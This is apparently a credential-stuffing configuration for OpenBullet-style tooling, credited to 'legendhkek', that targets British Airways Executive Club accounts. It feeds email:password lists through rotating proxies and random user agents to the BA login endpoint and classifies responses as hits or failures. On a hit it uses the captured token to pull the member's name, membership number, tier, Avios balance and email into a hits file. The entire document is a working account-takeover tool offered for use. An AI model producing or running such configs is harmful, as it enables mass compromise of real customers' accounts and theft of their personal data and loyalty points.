[SETTINGS]
{
  "Name": "BRITISHAIRWAYS.COM - Executive Club",
  "SuggestedBots": 200,
  "MaxCPM": 200,
  "LastModified": "2025-11-20T12:20:00+00:00",
  "AdditionalInfo": "Real API Checker",
  "RequiredPlugins": [],
  "Author": "legendhkek",
  "Version": "1.0.0",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 10,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "Default",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": true,
  "CustomCMDArgs": "",
  "Title": "BRITISHAIRWAYS.COM",
  "IconPath": "Icon\\svbfile.ico",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://www.britishairways.com/travel/sso/public/en_gb/login"
  CONTENT "{\"membershipNumber\":\"<USER>\",\"password\":\"<PASS>\",\"rememberMe\":false}"
  CONTENTTYPE "application/json"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Content-Type: application/json"
  HEADER "Origin: https://www.britishairways.com"
  HEADER "Referer: https://www.britishairways.com/travel/home/execclub/_gf/en_gb/loginr"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
  HEADER "X-Requested-With: XMLHttpRequest"

KEYCHECK
  KEYCHAIN Failure OR
    KEY "invalid"
    KEY "incorrect"
    KEY "does not match"
    KEY "authentication failed"
    KEY "\"error\""
    KEY "\"status\":400"
    KEY "\"status\":401"
    KEY "\"status\":403"
  KEYCHAIN Success OR
    KEY "success"
    KEY "\"token\""
    KEY "\"session\""
    KEY "\"authenticated\":true"

PARSE "<SOURCE>" LR "\"token\":\"" "\"" -> VAR "TOKEN"
  SAFE

PARSE "<SOURCE>" LR "\"sessionId\":\"" "\"" -> VAR "SESSION"
  SAFE

REQUEST GET "https://www.britishairways.com/api/execclub/v1/member/profile"
  HEADER "Accept: application/json"
  HEADER "Authorization: Bearer <TOKEN>"
  HEADER "Cookie: SESSION=<SESSION>"
  HEADER "Content-Type: application/json"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
  SAFE

PARSE "<SOURCE>" LR "\"firstName\":\"" "\"" -> VAR "firstname"
  SAFE

PARSE "<SOURCE>" LR "\"lastName\":\"" "\"" CreateEmpty=FALSE -> CAP "Name" "<firstname> " ""
  SAFE

PARSE "<SOURCE>" LR "\"membershipNumber\":\"" "\"" CreateEmpty=FALSE -> CAP "Membership"
  SAFE

PARSE "<SOURCE>" LR "\"tierLevel\":\"" "\"" CreateEmpty=FALSE -> CAP "Tier"
  SAFE

PARSE "<SOURCE>" LR "\"aviosBalance\":" "," CreateEmpty=FALSE -> CAP "Avios"
  SAFE

PARSE "<SOURCE>" LR "\"email\":\"" "\"" CreateEmpty=FALSE -> CAP "Email"
  SAFE

ConstantString "legendhkek" -> CAP "By"
